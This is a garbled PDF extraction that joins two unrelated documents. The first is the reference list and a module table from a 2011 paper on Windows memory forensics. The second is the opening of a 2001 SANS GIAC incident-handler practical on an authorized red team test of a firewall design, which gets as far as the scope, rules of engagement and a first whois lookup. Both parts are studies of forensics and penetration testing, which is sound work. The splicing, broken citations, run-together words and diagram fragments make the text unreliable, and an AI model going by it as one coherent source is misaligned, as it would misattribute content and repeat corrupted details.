problem?, http://www.blackhat.com/presentations/bh-usa-
06/BH-US-06-Morgenstern.pdf ; 2006.
Bryner J. Facebook memory forensics, http://computer-forensics.
sans.org/blog/2009/11/20/facebook-memory-forensics ;
November 2009.
Burdach M. An introduction to windows memory forensic, http://
forensic.seccure.net/pdf/introduction_to_windows_memory_forensic.pdf ; July 2005.
Butler J. Fu rootkit, http://www.rootkit.com/board_project_fused.
php?did 1⁄4proj2012 ; 2005.
Carr C. Grepexec: grepping executive objects from pool memory,
http://uninformed.org/?v1⁄4 4&a1⁄42&t1⁄4pdf; May 2006.
Carrier BD, Grand J. A hardware-based memory acquisition
procedure for digital investigations. Digital Investigation 2004;1(1):50 e60.
Carrier
B, Spafford EH. Getting physical with the digital
investigation process. International Journal of Digital Evidence
2003;2(2):1 e20.
Carvey H. The windows registry as a forensic resource. Digital
Investigation 2005;2(3). 201 e205.
Carvey H. Windows forensic analysis. Syngress Publishing; 2007.
Case A, Cristina A, Marziale L, Richard GG, Roussev V. Face:
automated digital evidence discovery and correlation. DigitalInvestigation 2008;5(1):S65 e75.
Casey E. Digital evidence and computer crime eforensic science,
computers, and the internet. 2nd ed. Academic Press; 2004.
Chan EM, Carlyle JC, David FM, Farivar R, Campbell RH.
Bootjacker: compromising computers using forced restarts. In:
Proceedings of the 15th ACM conference on computer and
communications security; 2008.
Chan E, Wan W, Chaugule A, Campbell R. A framework for
volatile memory forensics. In: Proceedings of the16th ACMconference on computer and communications security; 2009.Table A.1 ( continued )
Module name Description
modscan2 Scans a memory image for
_LDR_DATA_TABLE_ENTRY objects that
save the base address, size, and path of all
dynamically loaded libraries (DLLs) that
are referenced by a process (see Section4.5).
procexedump Creates an executable (.EXE ) file of
a process. While the recovered file isunlikely to run due to changes in its datasection, the binary can frequently be
successfully disassembled for further
analysis and reveal malicious activities(see Section 4.5).
pslist Follows the ActiveProcessLinks list that is
part of the _EPROCESS block to enumerate
running processes on the system (see
Section 4.1).
psscan Applies a signature-based search
algorithm to locate _EPROCESS structures
within a memory image and reveal
potential Direct Kernel Object Manipulation
(DKOM) attacks (see Section 4.1).
pstree Generates a tree-like view of runningsystem processes. The tree is derived fromthe output of the pslist command (see
Section 4.1).
regobjkeys Enumerates the list of open registry keys
that are referenced by a process (seeSection 4.3).
sockets Finds the _AddrObjTable hash table in
thetcpip.sys driver file and follows the
singly linked list of _ADDRESS_OBJECT
entries to enumerate listening sockets onthe target system (see Section 4.4).
sockscan Scans the non-paged pool of the operatingsystem for allocations that contain
information about open network sockets
(see Section 4.4).
vaddump Traverses the Virtual Address Descriptor
(VAD) tree of a process and dumps the
allocated memory segments to a file (see
Section 4.5).
vadinfo Prints detailed information abouta process’s Virtual Address Descriptor (VAD)
tree that contains the range of memoryaddresses that are allocated by theapplication as well as references to loaded
modules and memory-mapped files (see
Section 4.5).
vadtree Creates a graphical structure ofa process’s Virtual Address Descriptor (VAD)
tree (see Section 4.5).digital investigation 8 (2011) 3 e22 19
Chang K, Kim G, Kim K, Kim W. Initial case analysis using
windows registry in computer forensics. In: Proceedings of the
future generation communication and networking; 2007.
Chow J, Pfaff B, Garfinkel T, Rosenblum M. Shredding your
garbage: reducing data lifetime through secure deallocation.
In: Proceedings of the 14th conference on USENIX security
symposium; 2005.
Cohen M. Pyflag ean advanced network forensic framework. In:
Proceedings of the digital forensic research workshop(DFRWS); 2008.
Computer Security Institute. 14th annual CSI computer crime and
security survey; December 2009.
Craton J. Netcat for windows, http://joncraton.org/blog/netcat-
for-windows ; 2009.
Crazylord. Playing with windows /dev/(k)mem. Phrack Magazine
2002;59(16):1 e14.
DFRWS. Dfrws 2005 forensics challenge, http://www.dfrws.org/
2005/challenge/index.shtml ; 2005.
DFRWS. Dfrws 2008 forensics challenge results, http://www.
dfrws.org/2008/challenge/results.shtml ; 2008.
DFlabs. Ptk forensics, http://ptk.dflabs.com/ ; 2010.
Darawk. Cloakdll, http://www.darawk.com/code/CloakDll.cpp ;
2005.
Dolan-Gavitt B. The vad tree: a process-eye view of physical
memory. Digital Investigation 2007a;4(1):62 e4.
Dolan-Gavitt B. Vadtools, http://vadtools.sourceforge.net/ ; May
2007b.
Dolan-Gavitt B. Cell index translation, http://moyix.blogspot.
com/2008/02/cell-index-translation.html; February 2008a.
Dolan-Gavitt B. Finding kernel global variables in windows,
http://moyix.blogspot.com/2008/04/finding-kernel-global-
variables-in.html ; 2008b.
Dolan-Gavitt B. Forensic analysis of the windows registry in
memory. Digital Investigation 2008c;5(1):S26 e32.
Dolan-Gavitt B. Linking processes to users, http://moyix.blogspot.
com/2008/08/linking-processes-to-users.html ; August 2008d.
Dolan-Gavitt B. Reading open keys, http://moyix.blogspot.com/
2008/02/reading-open-keys.html ; February 2008e.
Dolan-Gavitt B, Srivastava A, Traynor P, Giffin J. Robust signatures
for kernel data structures. In: Proceedings of the 16th ACMconference on computer and communications security; 2009.
Dolan-Gavitt B, Payne B, Lee W. Leveraging forensic tools for
virtual machine introspection. Georgia Institute of
Technology; 2011. Tech. rep.
Dornseif M, Becher M. Feuriges hacken espaß mit firewire. In:
Proceedings of the 21st chaos communication congress; 2004.
Drinkwater R. Facebook chat forensics, http://
forensicsfromthesausagefactory.blogspot.com/2009/03/
facebook-chat-forensics.html ; March 2009.
Farmer D, Venema W. Forensic discovery. Addison Wesley; 2005.
Forensics Wiki. List of volatility plugins, http://www.forensicswiki.
org/wiki/List_of_Volatility_Plugins ; Februaray 2010.
Foundstone, Inc. Fport, http://www.foundstone.com/us/
resources/proddesc/fport.htm ; 2000.
Knttools with kntlist. GMG Systems, Inc, http://gmgsystemsinc.
com/knttools/ ; 2007.
Gao Y, Cao T. Memory forensics for qq from a live system. Journal
of Computers 2010;5(4):541 e8.
Garcia GL. Forensic physical memory analysis: an overview of
tools and techniques. Helsinki University of Technology,
http://www.tml.tkk.fi/Publications/C/25/papers/Limongarcia_
final.pdf ; 2007. Tech. rep.
Garner GM. Knttools with kntlist, http://gmgsystemsinc.com/
knttools/ ;
 2007.
Garner GM. Forensic acquisition utilities, http://gmgsystemsinc.
com/fau/ ; 2009.
Gary HB. Fastdump ea memory acquisition tool, https://www.
hbgary.com/products-services/fastdump/ ; 2009.Getgen K. 2009 encryption and key management industry
benchmark report, http://iss.thalesgroup.com/Resources/
Webinars/Benchmarksurvey-November52009-Webinar.aspx ;
2009.
Richard III Golden G. Scalpel: A frugal, high performance file carver,
http://www.digitalforensicssolutions.com/Scalpel/ ; 2006.
Group TC. Trusted platform module edesign principles, http://
www.trustedcomputinggroup.org/resources/tpm_main_
specification ; July 2007.
Guidance Software. Encase enterprise platform, http://www.
guidancesoftware.com/computer-forensics-fraud-investigation-software.htm ; 2010.
Halderman JA, Schoen SD, Heninger N, Clarkson W, Paul W,
Calandrino JA, et al. Lest we remember: cold-boot attacks onencryption keys. Communications of the ACM 2009;52(5):91 e8.
Hargreaves C, Chivers H. Recovery of encryption keys from
memory using a linear scan. In: Proceedings of the 2008 third
international conference on availability, reliability and
security; 2008.
Haruyama T. Encase enscript "memory forensic toolkit", http://
tharuyama.blogspot.com/2009/10/encase-enscript-memory-
forensic-toolkit.html ; October 2009. part1.
Hay B, Nance K. Forensics examination of volatile system data
using virtual introspection. ACM SIGOPS Operating SystemsReview 2008;42(3):74 e82.
Hejazi S, Talhia C, Debbabi M. Extraction of forensically sensitive
information from windows physical memory. Digital
Investigation 2009;6(1):S121 e31.
Heninger N, Shacham H. Reconstructing rsa private keys from
random key bits. Cryptology ePrint Archive 2009;(510):1 e17.
2008.
Hoglund G. The value of physical memory for incident response,
http://www.hbgary.com/wp-content/themes/blackhat/images/the-value-of-physical-memory-for-incident-response.pdf; 2008.
Honeynet Project. Know your enemy elearning about security
threats. Addison Wesley; 2004.
Hulton D. Cardbus bus-mastering: 0wning the laptop. In:
Proceedings of ShmooCon; 2006.
Intel Corporation. Intel
/C21064 and ia-32 architectures software
developer’s manual, http://www.intel.com/Assets/PDF/
manual/325384.pdf ; 2011.
Internet Crime Complaint Center. 2009 ic3 annual report, http://
www.ic3.gov/media/annualreport/2009_IC3Report.pdf ; 2010.
Ionescu A. Getting kernel variables from kdversionblock. part 2,
http://www.rootkit.com/newsread.php?newsid 1⁄4153; 2005.
Kaplan, B., 2007. Ram is key eextracting disk encryption keys
from volatile memory. Master’s thesis, Carnegie MellonUniversity.
Kdm. Ntillusion: a portable win32 userland rootkit. Phrack
Magazine 2004;11(62):1 e26.
Klein T. All your private keys are belong to us eextracting rsa
private keys and certificates from process memory, http://
trapkit.de/research/sslkeyfinder/keyfinder_v1.0_20060205.pdf ;
February 2006a.
Klein T. Process dumper, http://www.trapkit.de/research/
forensic/pd/index.html ; 2006b.
Kornblum JD. Exploiting the rootkit paradox with windows
memory analysis. International Journal of Digital Evidence2006;5(1):1 e5.
Kornblum J. Recovering executables with windows memory
analysis, http://www.jessekornblum.com/presentations/
dodcc07.pdf ; 2007a.
Kornblum JD. Using every part of the buffalo in windows memory
analysis. Digital Investigation 2007b;4(1):24 e9.
Libster E, Kornblum JD. A proposal for an integrated memory
acquisition mechanism. ACM SIGOPS Operating SystemsReview 2008;42(3):14 e20.digital investigation 8 (2011) 3 e22 20
Ligh M, Adair S, Hartstein B, Richard M. Malware analyst’s
cookbook and DVD: tools and techniques for fighting
malicious code. Wiley; 2010.
Lynch NA, Merritt M, Weihl WE, Fekete A. Atomic transactions.
Morgan Kaufmann; 1993.
Mu ̈ller T, Dewald A, Freiling F. Tresor runs encryption securely
outside ram. In: Proceedings of the 20th USENIX security
symposium; 2011.
Mu ̈ller T, Dewald A, Freiling FC. Aesse: A cold-boot resistant
implementation of aes. In: Proceedings of the third Europeanworkshop on system security; 2010.
Maartmann-Moe C, Thorkildsen SE, A  ̊rnes A. The persistence of
memory: forensic identification and extraction of
cryptographic keys. Digital Investigation 2009;6(S1):S132 e40.
Maclean, N.P., 2006. Acquisition and analysis of windows
memory. Master’s thesis, University of Strathclyde, Glasgow.
Memory dd. ManTech CSI, Inc, http://sourceforge.net/projects/
mdd/files/ ; 2009.
Mandiant. Memoryze, http://www.mandiant.com/products/free_
software/memoryze/ ; 2010.
Mee V, Tryfonas T, Sutherland I. The windows registry as
a forensic artefact: illustrating evidence collection for internet
usage. Digit 2006;3(3):166 e73.
Microsoft Corporation. Notmyfault, http://download.sysinternals.
com/Files/Notmyfault.zip ; 2010 g.
Microsoft Corporation. Debugging tools for windows, http://www.
microsoft.com/whdc/devtools/debugging/default.mspx ; 2010a.
Microsoft Corporation. Device physicalmemory object, http://
technet.microsoft.com/de-de/library/cc78756528WS.1029.aspx ; 2010b.
Microsoft Corporation. Exallocatepoolwithtag, http://msdn.
microsoft.com/en-us/library/ff54452028WS.1029.aspx ; 2010c.
Microsoft Corporation. Kb244139-windows feature lets you
generate a memory dump file by using the keyboard. Crashdump file generation, http://support.microsoft.com/?
20scid 1⁄4kb3Ben-us3B244139&x 1⁄45&y1⁄49; 2010d.
Microsoft Corporation. Kb254649-overview of memory dump file
options for windows vista, windows server 2008 r2, windowsserver 2008, windows server 2003, windows xp, and windows
2000, http://support.microsoft.com/?scid 1⁄4kb3Ben-
us3B254649&x 1⁄413&y1⁄45; 2010e.
Microsoft Corporation. Kb971284-a hotfix is available to enable
crashonctrlscroll support for a usb keyboard on a computer thatis running windows vista sp1 or windows server 2008. Adding
support for USB keyboards in Windows Vista and Server 2008 tocreate a crash dump file, http://support.microsoft.com/?
scid1⁄4kb3Ben-us3B244139&x 1⁄45&y1⁄49; 2010f.
Microsoft Corporation. Virtuallock function, http://msdn.microsoft.
com/en-us/library/aa36689528v 1⁄4vs.8529.aspx ; 2010h.
Microsoft Corporation. Windows registry information for
advanced users, http://support.microsoft.com/kb/256986/ ;
February 2008.
Microsoft Corporation. Bitlocker drive encryption, http://tec
 hnet.
microsoft.com/en-us/library/cc73154928WS.1029.aspx ;
February 2009.
Miller M, Turkulainen J. Remote library injection, http://www.
nologin.org/Downloads/Papers/remote-library-injection.pdf ;
June 2006.
MoonSols. Windows memory toolkit, http://moonsols.com/
product ; 2010.
Moore D, Paxson V, Savage S, Shannon C, Staniford S, Weaver N.
Inside the slammer worm. IEEE Security and Privacy 2003;1(3):33e9.
Movall P, Nelson W, Wetzstein S. Linux physical memory
analysis. In: Proceedings of the USENIX annual technical
conference; 2005.
Mozilla Foundation. Private browsing, https://wiki.mozilla.org/
PrivateBrowsing ; January 2008.Mrdovic S, Huseinovic A, Zajko E. Combining static and live digital
forensic analysis in virtual environment. In: Proceedings of theXXII international symposium on information, communication
and automation technologies; 2009.
NT Internals. Hidden dynamic-link library detection test, http://
www.ntinternals.org/dll_detection_test.php ; October 2009.
Nance K, Bishop M, Hay B. Investigating the implications of
virtual machine introspection for digital forensics. In:Proceedings of the international conference on availability,
reliability and security; 2009.
Net Applications. Operating system market share, http://
marketshare.hitslink.com/operating-system-market-share.
aspx?qprid 1⁄410; December 2010.
Okolica J, Peterson GL. Windows operating systems agnostic
memory analysis. Digital Investigation 2010;7(1):S48 e56.
Open System Resources. Bang! ecrash on demand utility, http://
www.osronline.com/article.cfm?article 1⁄4153; 2009.
Oswald E. Toshiba’s hard drive breakthrough could herald mega-
capacity drives, http://www.betanews.com/article/Toshibas-
hard-drive-breakthough-could-herald-megacapacity-drives/1282246111 ; August 2010.
PGP Corporation. Pgp whole disk encryption, http://www.pgp.
com/products/wholediskencryption/index.html ; 2010.
Panholzer P. Physical security attacks on windows vista, https://
www.sec-consult.com/files/Vista_Physical_Attacks.pdf ; 2008.
Peng T, Leckie C, Ramamohanarao K. Survey of network-based
defense mechanisms countering the dos and ddos problems.ACM Computing Surveys 2007;39(1):1 e42.
Petroni NL, Fraser T, Molina J, Arbaugh WA. Copilot e
a coprocessor-based kernel runtime integrity monitor. In:Proceedings of the 13th USENIX security symposium; 2004.
Piegdon DR, Pimenidis L. Targeting physically addressable
memory. In: Proceedings of the 4th international conferenceon detection of intrusions and malware, and vulnerabilityassessment; 2007.
Rapid7 LLC. Metasploit’s meterpreter, http://www.metasploit.
com/documents/meterpreter.pdf ; 2004.
Rare Ideas. Portableapps.com platform, http://portableapps.com/ ;
2010.
Rolles R. Unpacking virtualization obfuscators. In: Proceedings
of the 3rd USENIX conference on offensive technologies;2009.
Roussev V, Richard III GG. Breaking the performance wall: The
case for distributed digital forensics. In: Proceedings of thedigital forensic research workshop (DFRWS); 2004.
Ruff N. Windows memory forensics. Journal in Computer
Virology 2008;4(2):83 e100.
Ruff N, Suiche M. Enter sandman. In: Proceedings of the 5th
annual PacSec applied security conference; 2007.
Russinovich ME. Tcpview, http://technet.microsoft.com/en-us/
sysinternals/bb897437.aspx ; August 2010.
Russinovich ME, Solomon DA, Ionescu A. Microsoft windows
internals.
5th ed. Microsoft Press; June 2009.
Rutkowska J. modgreper, http://www.invisiblethings.org/tools/
modGREPER ; June 2005.
Rutkowska J. Beyond the cpu: defeating hardware based ram
acquisition (part i: Amd case), http://invisiblethings.org/
papers/cheating-hardware-memory-acquisition-updated.ppt ;
February 2007.
Saout C. dm-crypt: A device-mapper crypto target, http://www.
saout.de/misc/dm-crypt/ ; 2006.
Savoldi A, Gubian P. Towards the virtual memory space
reconstruction for windows live forensic purposes. In:Proceedings of systematic approaches to digital forensicengineering (SADFE); 2008. p. 15 e22.
Schatz B. Bodysnatcher: towards reliable volatile memory
acquisition by software. Digital Investigation September2007a;4:126 e34.digital investigation 8 (2011) 3 e22 21
Schatz B. Recent developments in volatile memory forensics;
November 2007b.
Schuster A. Dmp file structure, http://computer.forensikblog.de/
en/2006/03/dmp_file_structure.html ; March 2006a.
Schuster A. Pool allocations as an information source in windows
memory forensics. In: Proceedings of IT-incident management
& IT-forensics; 2006b. p. 15 e22.
Schuster A. Reconstructing a binary, http://computer.forensikblog.
de/en/2006/04/reconstructing_a_binary.html ; April 2006c.
Schuster A. Searching for processes and threads in microsoft
windows memory dumps. Digital Investigation July 2006d;3(1):
10e6,http://computer.forensikblog.de/en/2006/03/dmp_file_
structure.html .
Schuster A. 64bit crash dumps, http://computer.forensikblog.de/
en/2008/02/64bit_crash_dumps.html ; February 2008a.
Schuster A. The impact of microsoft windows pool allocation
strategies on memory forensics. Digital Investigation 2008b;
5(S1):S58 e64.
Scientific Working Group on Digital Evidence (SWGDE). Swgde
recommended guidelines for validation testing eversion 1.1,
http://www.swgde.org/documents/current-documents/2009-01-15SWGDERecommendationsforValidationTestingVersion
v1.1.pdf ; 2009.
Shamir A, van Someren N. Playing hide and seek with stored
keys. In: Proceedings of the third international conference onfinancial cryptography; 1999.
Sharif M, Lanzi A, Giffin J, Lee W. Automatic reverse engineering
of malware emulators. In: Proceedings of the 30th IEEE
symposium on security and privacy; 2009.
Shipley TG, Reeve HR. Collecting evidence from a running
computer ea technical and legal primer for the justice
community, http://www.hbgary.com/wp-content/themes/
blackhat/images/collectevidenceruncomputer.pdf; 2006.
Simon M, Slay J. Enhancement of forensic computing
investigations through memory forensic techniques. In:Proceedings of the international conference on availability,
reliability and security (ARES); 2009.
Simon M, Slay J. Recovery of skype application activity data
from physical memory. In: Proceedings of the international
conference on availability, reliability and security (ARES);
2010.
Smith J, Cote M. The honeynet project forensic challenge 3:
banking troubles, http://honeynet.org/challenges/2010_3_
banking_troubles ; May 2010.
Smith JE, Nair R. The architecture of virtual machines. Journal of
Computer 2005;38(5):32 e8.
Solomon J, Huebner E, Bem D, Szezynska M. User data persistence
in physical memory. Digital Investigation 2007;4(2):68 e72.
Sophos Plc. Safeguard easy, http://www.sophos.com/products/
enterprise/encryption/safeguard-easy ; 2010.
Sparks S, Butler J. Shadow walker eraising the bar for rootkit
detection, http://www.blackhat.com/presentations/bh-jp-05/
bh-jp-05-sparks-butler.pdf ; 2005.
Spitzner L. Definitions and value of honeypots, http://www.
spitzner.net/honeypots.html ; May 2003a.
Spitzner L. Moving forward with defintion of honeypots, http://
www.securityfocus.com/archive/119/321957/30/0/threaded ;
May 2003b.
Stevens RM, Casey E. Extracting windows command line details
from physical memory. Digital Investigation 2010;7(1):S57e63.
Stover S, Dickerson M. Using memory dumps in digital forensics.
login: The USENIX Magazine 2005;30(6):43 e8.Suiche
M. Exploiting windows hibernation. In: Proceedings of
Europol high tech crime expert meeting; 2008a.
Suiche M. Sandman project, http://sandman.msuiche.net/docs/
SandMan_Project.pdf ; February 2008b.
Suiche M. Advanced mac OS physical memory analysis, http://
www.blackhat.com/presentations/bh-dc-10/Suiche_Matthieu/
Blackhat-DC-2010-Advanced-Mac-OS-X-Physical-Memory-
Analysis-wp.pdf ; February 2010.
Sutherland I, Evans J, Tryfonas T, Blyth A. Acquiring volatile
operating system data tools and techniques. ACM SIGOPSOperating Systems Review 2008;42(3):65 e73.
BBN Technologies. Fred: Forensic ram extraction device, http://
www.ir.bbn.com/vkawadia/ ; 2006.
Truecrypt. TrueCrypt Foundation, http://www.truecrypt.org/ ;
2010.
Tsow A. An improved recovery algorithm for decayed as key
schedule images. Lecture Notes in Computer Science 2009;
5867:215 e30.
U.S. Department of Justice. Electronic crime scene investigation:
A guide for first responders, http://www.ncjrs.gov/pdffiles1/
nij/219941.pdf ; 2008.
U.S. Secret Service. Best Practices for seizing electronic evidence;
2006.
United States Air Force Office of Special Investigations, March
2001. Foremost. http://foremost.sourceforge.net/
VMware, Inc. What files make up a virtual machine?, http://www.
vmware.com/support/ws55/doc/ws_learning_files_in_a_vm.
html ; 2010.
van Baar R, Alink W, van Ballegooij A. Forensic memory analysis:
files mapped in memory. In: Proceedings of the DigitalForensic Research Workshop (DFRWS); 2008.
Vidas T. The acquisition and analysis of random access memory.
Journal of Digital Forensic Practice 2006;1(4):315 e23.
Vidas T. Volatile memory acquisition via warm boot memory
survivability. In: Proceedings of the 43rd Hawaii international
conference on system sciences; 2010.
Vidstrom A. Pmdump, http://ntsecurity.nu/toolbox/pmdump/ ;
2002.
Vidstrom A. Memory dumping over firewire euma issues, http://
ntsecurity.nu/onmymind/2006/2006-09-02.html ; 2006.
Volatile Systems, LLC. The volatility framework: volatile memory
artifact extraction utility framework, https://www.
volatilesystems.com/default/volatility ; 2008.
Walters A, Fatkit: Detecting ma licious library injection and
upping the “Anti”. Tech. rep., 4 T fForensic Research.
2006.
Walters A, Petroni NL. Volatools: integrating volatile memory
forensics into the digital investigation process. In: Proceedings
of Black Hat DC 2007; February 2007.
X-Ways Software Technology AG. Winhex: computer forensics &
data recovery software, hex editor & disk editor, http://www.
x-ways.net/winhex/index-m.html ; 2010.
Young A, Yung M. Malicious cryptography eexposing
cryptovirology. Wiley; 2004.
Zhang R, Wang L, Zhang S. Windows memory analysis based on
kpcr. In: Proceedings of the fifth international conference oninformation assurance and security; 2009.
Zhang S, Wang L, Zhang R, Guo Q. Exploratory study on memory
analysis of windows 7 operating system. In: Proceedings of theThird international conference on advanced computer theoryand engineering (ICACTE); 2010.
Zhao Q, Cao T. Collecting sensitive information from windows
physical memory. Journal of Computers January 2009;4(1):3 e10.digital investigation 8 (2011) 3 e22 22© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Red Team Assessment of Parliament Hill Firewall Practical #0063SANS GIAC GCIH Practical AssignmentPatriot SANS 2001
Submitted By: Joshua WrightDate: October 3, 2001Practical Assignment Version 1.5b
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 1 of 49IntroductionThis paper is written to demonstrate weaknesses in the security architecture proposed byParliament Hill Firewall Practical #0063 in an effort to fulfill the practical requirement for theGIAC Certified Incident Handler Certification.In this document I will detail the steps utilized to penetrate the security architecture mentionedabove in several phases including pre-assessment, preparation, reconnaissance/informationgathering, network surveying, scanning and probing, manual vulnerability testing/exploitingvulnerabilities, information retrieval, and security policy review.  Each phase will identify indetail all the steps performed, the commands typed, the tools used and the reasoning behind eachstep.  The reader will be able to follow this document from start to finish with enoughinformation to recreate the red team assessment.In his paper, Colin Stuckless designed an environment where GIAC Enterprises, a new InternetStartup that expects to earn $200 million per year in sales of online fortune cookie sayings,established a secure Internet presence utilizing filtering routers, firewalls and VPN servers(Stuckless).  GIAC Enterprises needs to rapidly implement the Visa “Ten Commandments,”presumably in order to obtain permission to accept credit-card sales online (Visa International).Stuckless continues to establish a base security policy in which he describes the configuration ofthe equipment he chose to implement a secure computing environment, to meet the Visa “TenCommandments”.While complete configuration information was not provided to the reader in Stuckless’ paper,partial configuration information was listed.  In addition, Stuckless alluded to severalconfiguration changes from the defaults on a Cisco 3640 border router and a Cisco PIX 520firewall.  I have taken this information and applied it to equipment where available for testingpurposes.  The commands presented within are executed on actual equipment, with littletailoring/obfuscation before presenting the results to the reader.The network configuration Stuckless described is detailed in the following diagram:
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 2 of 49Screening/FilteringRouterVPNGatewayFirewallInternet
Screened ServiceNetwork
CorporateProtected NetworkDiagram 1 (Stuckless).Stuckless established five servers located in a screened service network, supplying HTTP,HTTPS, FTP, DNS, and SMTP services.  Implementing the principle of least privilege (POLP)for each of these servers, he enables only those ports necessary to access the single resource eachof these servers provides through the firewall.For my testing purposes, I have expanded the physical configuration of the network Stucklessdescribed in the following manner.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 3 of 49Cisco 3640 router
Cisco PIX 525Internet
NT 4.0 FTP3.3.3.4
OS: Windows 98ClientCisco Catalyst3524-XL-EN
Cisco Catalyst3524-XL-ENCisco Catalyst3524-XL-ENNT 4.0 HTTP3.3.3.5NT 4.0 HTTPS3.3.3.6NT 4.0 DNS3.3.3.7NT 4.0 SMTP3.3.3.81.1.1.2
1.1.1.1
2.2.2.23.3.3.3205.179.30.114
Diagram 2.I propose the following environment to be used by the red team to assess the network listed inDiagram 2:
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 4 of 49Cisco 2514router3ComHub 10MotorolaCable ModemOS: RH Linux 7.1
OS: RH Linux 7.1OS: Windows 2000 Prof.Hardware: Clone,Pentium II 233 Mhz3ComHub 10
Cisco 3640 router
Cisco PIX 525NT 4.0 FTP3.3.3.4
OS: Windows 98ClientCisco Catalyst3524-XL-EN
Cisco Catalyst3524-XL-ENCisco Catalyst3524-XL-ENNT 4.0 HTTP3.3.3.5NT 4.0 HTTPS3.3.3.6NT 4.0 DNS3.3.3.7NT 4.0 SMTP3.3.3.81.1.1.2
1.1.1.1
2.2.2.23.3.3.3Internet
205.179.20.114138.91.123.101
Diagram 3.Among the resources used by the red team are a Cisco 2514 (dual-ethernet) router, hubs, Internetaccess through a cable modem, a Windows 2000 Professional workstation and a Red Hat Linuxworkstation.  All of these resources are readily available at little cost.With a diagram of the services targeted, the reader has a good understanding of the scenariodescribed by Stuckless in his Firewall Practical.  We begin our red team assessment without theknowledge presented in the previous diagrams, opting instead to discover the topology throughtools publicly available to the hacker.Preparing for Network PenetrationGIAC Enterprises has hired XYZ Network Security Firm to perform a penetration test on theirnewly established security infrastructure.  Before jumping into the test, XYZ meets with thecustomer and establishes guidelines and rules for use in their testing.1. Scope of workBefore beginning the penetration tests, XYZ asks the customer the desired output fromthe testing services, and what should be considered out of scope.  After carefulconsideration, GIAC Enterprises decides the penetration test should be staged against theGIAC Enterprises network with respect to their Internet accessibility.  Other publicnetworks (PSTN) are considered out of scope.  Also out of scope are denial-of-service
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 5 of 49attacks and social engineering techniques targeted directly at employees of theorganization.2. Ethical Hacking GuidelinesXYZ performs penetration tests while following the guidelines made available from theOpen Source Security Testing Methodology Manual (Herzog).  For the purposes of thistest, XYZ will utilize the following modified methodology:1. Reconnaissance/Information gathering (document grinding)2. Network Surveying3. Scanning and Probing4. Manual Vulnerability Testing5. Information Retrieval6. Security Policy ReviewDuring each stage of the test, members of the XYZ red team will clearly document allsteps with enough information so they can be recreated after the analysis is complete.XYZ also encourages the GIAC Enterprises Incident Handling Team to utilize theopportunity to execute their incident handling action plan, following the penetration test.3. LegaleseXYZ will establish a non-disclosure agreement with GIAC Enterprises that calls forcomplete disclosure of the test with clear documentation.  Additionally, red teammembers will work in pairs at all times with all notes signed by both team members anddelivered to GIAC Enterprises at the completion of the project.  Furthermore, GIACEnterprises will sign a release explicitly permitting XYZ Enterprises the ability toexecute their test plan without repercussion.Once the scope, guidelines and legalese documents are completed and signed by both GIACEnterprises and the XYZ red team, XYZ will execute their test plan and report back to GIACEnterprises.Executing the Network Penetration TestThrough working with GIAC Enterprises to establish the parameters for the penetration test, thered team has learned a bit about the company.  Already, the team has gathered the followinginformation:• Company Nameo GIAC Enterprises• Names, email addresses and titles of security personnel, management personnel.(They possibly have met accounting personnel when submitting quote, etc.)o John Doe, Senior Security Engineer, jdoe@giace.como James Donovan, Team Leader Networks, jdonovan@giace.como William Dolterhund, CIO, wdolterhund@giace.com• Part of the email addresses is the company’s domain name.• Addresses of various facilities that are used by the company.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 6 of 49The red team also assumes the presence of a firewall and an established security policy.  Therules regarding the security policy and the methods in which they are enforced are not yetknown.With this information, the red team begins their reconnaissance by searching public informationdatabases.Reconnaissance/Information GatheringA tremendous amount of information is available about a company from public sources on theInternet.  I have listed several steps below that can be called “document grinding” or “electronicdumpster diving.”  All of them are performed without contacting the company network we aretrying to penetrate, thus leaving little or no risk of notice by intrusion detection systems or othernetwork monitoring/logging facilities.A1. Search for whois information on domain name.Using a web interface or the Unix-supplied “whois” tool, the red team can perform a search onthe domain name learned above in order gather publicly stored information about the companyand the name servers answering for their domain name.Tool Used: Unix supplied “whois” command, or search from public whois search site(http://www.networksolutions.com/cgi-bin/whois/whois).Commands Typed: “whois giace.com”Output Received:linux $ whois giace.com[whois.crsnic.net]Whois Server Version 1.3Domain names in the .com, .net, and .org domains can now be registeredwith many different competing registrars. Go to http://www.internic.netfor detailed information.   Domain Name: GIACE.COM   Registrar: NETWORK SOLUTIONS, INC.   Whois Server: whois.networksolutions.com   Referral URL: http://www.networksolutions.com   Name Server: DNS.GIACE.COM   Name Server: DNSAUTH1.ISP.NET   Name Server: DNSAUTH2.ISP.NET   